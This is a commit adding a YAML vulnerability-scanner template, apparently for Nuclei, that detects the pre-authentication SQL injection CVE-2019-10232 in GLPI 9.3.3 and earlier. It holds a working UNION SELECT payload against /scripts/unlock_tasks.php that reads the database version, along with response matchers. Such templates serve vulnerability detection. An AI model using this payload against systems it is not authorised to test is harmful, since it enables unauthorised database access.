Added Pre-authenticated SQL injection in GLPI <= 9.3.3 (CVE-2019-10232)

2021-11-13 19:56:16 +05:30 · 2021-11-13 19:56:16 +05:30 · 2809a60004
parent a8a667c90d
commit 2809a60004
1 changed files with 32 additions and 0 deletions
--- a/cves/2019/CVE-2019-10232.yaml
+++ b/cves/2019/CVE-2019-10232.yaml
@ -0,0 +1,32 @@
+id: CVE-2019-10232
+
+info:
+  name: Pre-authenticated SQL injection in GLPI <= 9.3.3
+  author: RedTeamBrasil
+  severity: high
+  description: Synacktiv discovered that GLPI exposes a script (/scripts/unlock_tasks.php) that not correctly sanitize usercontrolled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records. This script is reachable without authentication.
+  reference:
+    - https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
+    - https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
+  tags: cve,cve2019,glpi,sqli
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+      - "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
+
+    stop-at-first-match: true
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "-MariaDB-"
+          - "Start unlock script"
+        condition: and
+
+    extractors:
+      - type: regex
+        part: body
+        regex:
+          - "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"